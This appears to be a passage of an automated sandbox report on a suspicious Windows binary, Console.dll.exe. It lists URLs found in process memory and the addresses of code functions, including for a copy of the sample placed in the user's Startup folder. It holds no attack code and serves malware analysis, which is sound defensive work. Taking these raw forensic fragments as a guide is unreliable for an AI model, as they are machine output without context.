            Source: Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739585852.00006EEC002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554153967.00001794002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
            Source: chrome.exe, 00000003.00000003.1352219733.000044A4002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1352296337.000044A4002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1742430714.00004034002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1742467049.00004034002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 00000008.00000002.2551193176.0000023E85508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.comEs
            Source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
            Source: Console.dll.exe, System.Xml.XmlSerializer.dll.0.dr, System.Reflection.Emit.Lightweight.dll.0.dr, System.Buffers.dll.0.dr, System.Runtime.Serialization.dll.0.dr, System.Reflection.TypeExtensions.dll.0.dr, System.Dynamic.Runtime.dll.0.dr, System.ComponentModel.Primitives.dll.0.dr, System.Diagnostics.Tracing.dll.0.dr, System.Threading.Tasks.Parallel.dll.0.dr, System.Diagnostics.TextWriterTraceListener.dll.0.dr, System.Text.Encodings.Web.dll.0.dr, System.IO.Compression.ZipFile.dll.0.dr, System.Runtime.Serialization.Primitives.dll.0.dr, System.Runtime.InteropServices.RuntimeInformation.dll.0.dr, System.Runtime.InteropServices.dll.0.dr, System.Security.Cryptography.ProtectedData.dll.0.dr, System.Configuration.dll.0.dr, System.Security.Cryptography.Algorithms.dll.0.dr, System.Resources.ResourceManager.dll.0.dr, System.Threading.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
            Source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50821
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
            Source: System.Dynamic.Runtime.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime4
            Source: System.IO.UnmanagedMemoryStream.dll.0.drString found in binary or memory: https://github.com/dotnet/runtime6s
            Source: Console.dll.exeString found in binary or memory: https://github.com/dotnet/runtimeN
            Source: SQLitePCLRaw.core.dll.0.drString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
            Source: SQLitePCLRaw.core.dll.0.drString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
            Source: Console.dll.exe, Microsoft.CSharp.dll.0.drString found in binary or memory: https://github.com/mono/linker/issues/1416.
            Source: Console.dll.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
            Source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpString found in binary or memory: https://github.com/mono/linker/issues/1895v
            Source: Console.dll.exe, Microsoft.CSharp.dll.0.drString found in binary or memory: https://github.com/mono/linker/issues/1906.
            Source: Console.dll.exeString found in binary or memory: https://github.com/mono/linker/issues/378
            Source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/mono/linker/pull/2125.
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
            Source: chrome.exe, 00000008.00000002.2554033678.00001794002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
            Source: chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552197489.0000179400040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://system.data.sqlite.org/
            Source: Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
            Source: chrome.exe, 00000008.00000002.2551193176.0000023E8559B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.vign.com/CPS04
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_014184000_2_01418400
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_011146300_2_01114630
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_00FE97C00_2_00FE97C0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01099D000_2_01099D00
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0109EDB00_2_0109EDB0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010D2F700_2_010D2F70
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0101F1100_2_0101F110
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012DA1400_2_012DA140
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0146B1800_2_0146B180
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010AB0500_2_010AB050
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010633A00_2_010633A0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_014783F00_2_014783F0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_014A93F00_2_014A93F0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0109D2600_2_0109D260
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010A22D00_2_010A22D0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_00FEA4F00_2_00FEA4F0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012BE5300_2_012BE530
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012C75E00_2_012C75E0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012DA4600_2_012DA460
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_00FE35B00_2_00FE35B0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010754800_2_01075480
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_00FF35000_2_00FF3500
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0131E7300_2_0131E730
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0141A7000_2_0141A700
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010DC7500_2_010DC750
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012C97A00_2_012C97A0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010876200_2_01087620
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012D26600_2_012D2660
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0107D6800_2_0107D680
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0116B6C00_2_0116B6C0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_010956E00_2_010956E0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01294B000_2_01294B00
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012CFB000_2_012CFB00
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01067B500_2_01067B50
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01417B800_2_01417B80
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0127DBF00_2_0127DBF0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012D7A100_2_012D7A10
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01095AA00_2_01095AA0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012C6DA00_2_012C6DA0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_011C7DE00_2_011C7DE0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012CDC800_2_012CDC80
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01183CA00_2_01183CA0
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01007F100_2_01007F10
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012D8F800_2_012D8F80
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01082E100_2_01082E10
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01166E600_2_01166E60
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_012D9ED00_2_012D9ED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_008E84007_2_008E8400
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005E46307_2_005E4630
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004B97C07_2_004B97C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00569D007_2_00569D00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0056EDB07_2_0056EDB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005A2F707_2_005A2F70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0057B0507_2_0057B050
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0093B1807_2_0093B180
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007AA1407_2_007AA140
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004EF1107_2_004EF110
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0056D2607_2_0056D260
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005722D07_2_005722D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_009483F07_2_009483F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_009793F07_2_009793F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005333A07_2_005333A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007AA4607_2_007AA460
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004BA4F07_2_004BA4F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005454807_2_00545480
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0078E5307_2_0078E530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004C35007_2_004C3500
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007975E07_2_007975E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004B35B07_2_004B35B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007A26607_2_007A2660
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005576207_2_00557620
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0063B6C07_2_0063B6C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005656E07_2_005656E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0054D6807_2_0054D680
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_005AC7507_2_005AC750
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007EE7307_2_007EE730
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_008EA7007_2_008EA700
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_006F27A07_2_006F27A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007997A07_2_007997A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007A7A107_2_007A7A10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00565AA07_2_00565AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00537B507_2_00537B50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_008E7B807_2_008E7B80
